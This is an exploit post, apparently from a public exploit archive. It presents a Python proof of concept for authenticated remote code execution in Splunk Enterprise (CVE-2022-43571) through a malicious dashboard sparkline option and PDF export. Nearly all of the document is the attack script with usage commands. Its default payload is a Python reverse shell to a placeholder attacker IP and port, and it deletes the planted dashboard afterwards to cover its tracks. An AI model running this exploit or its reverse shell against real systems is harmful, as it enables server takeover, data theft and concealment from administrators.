Share
## https://sploitus.com/exploit?id=PACKETSTORM:215966
=============================================================================================================================================
    | # Title     : Splunk Enterprise 8.2.9 / 9.0.2 Authenticated Remote Code Execution via PDF Dashboard Rendering                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.splunk.com                                                                                                      |
    =============================================================================================================================================
    
    [+] Summary    : CVEโ€‘2022โ€‘43571 is a critical authenticated Remote Code Execution (RCE) vulnerability affecting Splunk Enterprise. 
                     The flaw resides in the SimpleXML dashboard PDF generation process, where insufficient input sanitization allows a privileged authenticated user to inject malicious content into dashboard configurations. 
    				 When the affected dashboard is exported to PDF, the injected content may be executed in the context of the Splunk server, potentially leading to full system compromise. 
                     Successful exploitation requires valid Splunk credentials but can result in arbitrary command execution, data exposure, and lateral movement. Splunk has released patches, 
    				 and immediate upgrading to a fixed version is strongly recommended.
    
    [+] Usage : 
    
    pip install requests packaging
    
    # For testing only   : python poc.py -u https://splunk.example.com:8000 --username admin --password password --check-only
    
    # To run the exploit : python poc.py -u https://splunk.example.com:8000 --username admin --password password
    
    [+] POC :
    
    #!/usr/bin/env python3
    
    import requests
    import random
    import string
    import re
    import sys
    import time
    import urllib.parse
    from typing import Optional, Dict, Tuple
    import base64
    import json
    
    class SplunkExploit:
        def __init__(self, target_url: str, username: str, password: str, use_inline_query: bool = False):
            self.target_url = target_url.rstrip('/')
            self.username = username
            self.password = password
            self.use_inline_query = use_inline_query
            self.session = requests.Session()
            self.session.verify = False
            self.session.headers.update({
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            })
    
            self.cookie = None
            self.target_app = None
            self.dash_name = None
    
        def splunk_login(self) -> Optional[str]:
            """Authenticate to Splunk and return session cookie."""
            login_url = f"{self.target_url}/en-US/account/login"
    
            resp = self.session.get(login_url)
            if resp.status_code != 200:
                print(f"[-] Failed to access login page: {resp.status_code}")
                return None
    
            cval_match = re.search(r'name="cval"\s+value="([^"]+)"', resp.text)
            if not cval_match:
                print("[-] Could not find cval token")
                return None
            
            cval = cval_match.group(1)
    
            login_data = {
                'cval': cval,
                'username': self.username,
                'password': self.password,
                'set_has_logged_in': 'false'
            }
            
            resp = self.session.post(
                f"{self.target_url}/en-US/account/login",
                data=login_data,
                allow_redirects=False
            )
            
            if resp.status_code in [302, 200]:
    
                if 'splunkweb_csrf_token' in self.session.cookies:
                    self.cookie = f"splunkweb_csrf_token={self.session.cookies['splunkweb_csrf_token']}"
                    print(f"[+] Successfully logged in as {self.username}")
                    return self.cookie
            
            print("[-] Login failed")
            return None
    
        def check_splunk_version(self) -> Tuple[bool, str]:
            """Check if Splunk version is vulnerable."""
            if not self.cookie:
                self.cookie = self.splunk_login()
                if not self.cookie:
                    return False, "Login failed"
            
            version_url = f"{self.target_url}/en-US/app/launcher/home"
            headers = {'Cookie': self.cookie}
            
            resp = self.session.get(version_url, headers=headers)
            if resp.status_code != 200:
                return False, f"Failed to access home page: {resp.status_code}"
    
            version_match = re.search(r'Splunkยฎ\s+([\d\.]+)', resp.text)
            if version_match:
                version_str = version_match.group(1)
                print(f"[+] Found Splunk version: {version_str}")
    
                from packaging import version as pkg_version
                
                try:
                    v = pkg_version.parse(version_str)
    
                    if (pkg_version.parse("8.1.0") <= v <= pkg_version.parse("8.1.11")) or \
                       (pkg_version.parse("8.2.0") <= v <= pkg_version.parse("8.2.8")) or \
                       (pkg_version.parse("9.0.0") <= v <= pkg_version.parse("9.0.1")):
                        return True, f"Vulnerable version found: {version_str}"
                    else:
                        return False, f"Non-vulnerable version: {version_str}"
                except Exception as e:
                    print(f"[-] Error parsing version: {e}")
                    return False, "Could not parse version"
            
            return False, "Could not determine version"
    
        def gen_inline_splunk_query(self) -> str:
            """Generate an inline Splunk query."""
            row_id_name = self.random_string(8, 16)
            arr_field = self.random_string(8, 16)
            
            rand_count = random.randint(100, 500)
            step = random.randint(2, 15)
            
            col_count = random.randint(3, 10)
            column_names = [self.random_string(8, 16) for _ in range(col_count)]
            
            delimiter = random.choice([';', '|', ':', '#', '!'])
            names_string = delimiter.join(column_names)
            
            query = f"""
            | makeresults count={rand_count}
            | streamstats count as {row_id_name}
            | eval _time = now() - ({row_id_name} * {step}),
                   {arr_field} = split("{names_string}", "{delimiter}"),
                   sourcetype = mvindex({arr_field}, {row_id_name} % {col_count})
            | chart sparkline count by sourcetype
            """
            
            return query.strip()
    
        def get_system_index_splunk_query(self) -> str:
            """Get a query using system indexes."""
            rand_tail = random.randint(100, 200)
            index = random.choice(['_internal', '_audit', '_introspection'])
            return f"index={index} | tail {rand_tail} | chart sparkline count by sourcetype"
    
        def random_string(self, min_len: int = 8, max_len: int = 16) -> str:
            """Generate random alphanumeric string."""
            length = random.randint(min_len, max_len)
            return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
    
        def get_random_app(self, enabled: bool = True) -> str:
            """Get a random app name (simplified)."""
    
            common_apps = ['search', 'launcher', 'splunk_monitoring_console']
            return random.choice(common_apps)
    
        def create_dashboard(self, app: str, dash_name: str, template: str) -> bool:
            """Create a dashboard with malicious template."""
            create_url = f"{self.target_url}/en-US/splunkd/__raw/servicesNS/{self.username}/{app}/data/ui/views"
            
            headers = {
                'Cookie': self.cookie,
                'Content-Type': 'application/x-www-form-urlencoded',
                'X-Splunk-Form-Key': self.get_form_key()
            }
            
            data = {
                'name': dash_name,
                'eai:data': template
            }
            
            resp = self.session.post(create_url, headers=headers, data=data)
            if resp.status_code in [200, 201]:
                print(f"[+] Dashboard '{dash_name}' created successfully")
                return True
            
            print(f"[-] Failed to create dashboard: {resp.status_code}")
            print(f"Response: {resp.text[:500]}")
            return False
    
        def get_form_key(self) -> str:
            """Extract form key from Splunk page."""
            home_url = f"{self.target_url}/en-US/app/launcher/home"
            headers = {'Cookie': self.cookie}
            
            resp = self.session.get(home_url, headers=headers)
            if resp.status_code == 200:
                match = re.search(r'formKey\s*:\s*"([^"]+)"', resp.text)
                if match:
                    return match.group(1)
    
            return self.random_string(32, 32)
    
        def export_dashboard(self, app: str, dash_name: str) -> bool:
            """Trigger PDF export of dashboard to execute payload."""
            export_url = f"{self.target_url}/en-US/api/pdfgen/render"
            
            headers = {
                'Cookie': self.cookie,
                'Content-Type': 'application/json',
                'X-Splunk-Form-Key': self.get_form_key()
            }
            
            payload = {
                'serverURL': f"{self.target_url}/en-US",
                'app': app,
                'dashboard': dash_name,
                'width': 1000,
                'height': 800
            }
            
            try:
                resp = self.session.post(
                    export_url,
                    headers=headers,
                    json=payload,
                    timeout=30
                )
    
                print("[+] PDF export triggered (payload execution attempted)")
                return True
                
            except Exception as e:
                print(f"[*] Export request completed (expected if payload executes): {e}")
                return True
    
        def delete_dashboard(self, app: str, dash_name: str) -> bool:
            """Delete the created dashboard."""
            delete_url = f"{self.target_url}/en-US/splunkd/__raw/servicesNS/{self.username}/{app}/data/ui/views/{dash_name}"
            
            headers = {
                'Cookie': self.cookie,
                'X-Splunk-Form-Key': self.get_form_key()
            }
            
            resp = self.session.delete(delete_url, headers=headers)
            if resp.status_code in [200, 204]:
                print(f"[+] Dashboard '{dash_name}' deleted")
                return True
            
            return False
    
        def generate_malicious_template(self, payload: str) -> str:
            """Generate malicious dashboard template with payload."""
            if self.use_inline_query:
                splunk_query = self.gen_inline_splunk_query()
            else:
                splunk_query = self.get_system_index_splunk_query()
            
            style_param = random.choice(['lineColor', 'fillColor'])
            escaped_payload = urllib.parse.quote(payload)
            
            template = f"""<dashboard>
        <row>
            <panel>
                <table>
                    <search>
                    <query>
                        {splunk_query}
                    </query>
                    </search>
                    <format field="sparkline" type="sparkline">
                    <option name="{style_param}">{escaped_payload}</option>
                    </format>
                </table>
            </panel>
        </row>
    </dashboard>"""
    
            lines = template.split('\n')
            return '\n'.join(line.strip() for line in lines if line.strip())
    
        def exploit(self, reverse_shell_payload: str = None) -> bool:
            """Execute the full exploit chain."""
            print("[*] Starting Splunk RCE exploit (CVE-2022-43571)")
    
            print("[*] Attempting to login...")
            if not self.splunk_login():
                return False
    
            print("[*] Checking Splunk version...")
            is_vuln, msg = self.check_splunk_version()
            print(f"[*] {msg}")
            if not is_vuln:
                print("[-] Target does not appear to be vulnerable")
                return False
    
            if not reverse_shell_payload:
                # Example Python reverse shell payload
                reverse_shell_payload = """__import__('os').system('python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"YOUR_IP\\\",YOUR_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"')"""
            
            print(f"[*] Using payload: {reverse_shell_payload[:50]}...")
    
            print("[*] Generating malicious dashboard template...")
            template = self.generate_malicious_template(reverse_shell_payload)
    
            self.target_app = self.get_random_app()
            self.dash_name = self.random_string(8, 16)
            
            print(f"[*] Target app: {self.target_app}")
            print(f"[*] Dashboard name: {self.dash_name}")
    
            print("[*] Creating dashboard...")
            if not self.create_dashboard(self.target_app, self.dash_name, template):
                return False
    
            print("[*] Triggering PDF export to execute payload...")
            if not self.export_dashboard(self.target_app, self.dash_name):
                print("[-] Failed to trigger export")
    
            time.sleep(5)
    
            print("[*] Attempting to cleanup...")
            self.delete_dashboard(self.target_app, self.dash_name)
            
            print("[+] Exploit completed")
            return True
    
        def cleanup(self):
            """Cleanup created resources."""
            if self.target_app and self.dash_name:
                self.delete_dashboard(self.target_app, self.dash_name)
    
    def main():
        """Main function for standalone execution."""
        import argparse
        
        parser = argparse.ArgumentParser(description='Splunk RCE Exploit (CVE-2022-43571)')
        parser.add_argument('-u', '--url', required=True, help='Splunk base URL (e.g., https://splunk.example.com:8000)')
        parser.add_argument('--username', default='admin', help='Splunk username (default: admin)')
        parser.add_argument('--password', required=True, help='Splunk password')
        parser.add_argument('--inline-query', action='store_true', help='Use inline Splunk query')
        parser.add_argument('--check-only', action='store_true', help='Only check if target is vulnerable')
        
        args = parser.parse_args()
    
        import urllib3
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        
        exploit = SplunkExploit(
            target_url=args.url,
            username=args.username,
            password=args.password,
            use_inline_query=args.inline_query
        )
        
        try:
            if args.check_only:
                is_vuln, msg = exploit.check_splunk_version()
                print(f"\n{'='*50}")
                print(f"Check Results: {msg}")
                print(f"{'='*50}")
                sys.exit(0 if is_vuln else 1)
            else:
                success = exploit.exploit()
                sys.exit(0 if success else 1)
                
        except KeyboardInterrupt:
            print("\n[*] Exploit interrupted by user")
            exploit.cleanup()
            sys.exit(1)
        except Exception as e:
            print(f"\n[-] Error: {e}")
            exploit.cleanup()
            sys.exit(1)
    
    if __name__ == "__main__":
        main()
    	
    Greetings to :============================================================
    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
    ==========================================================================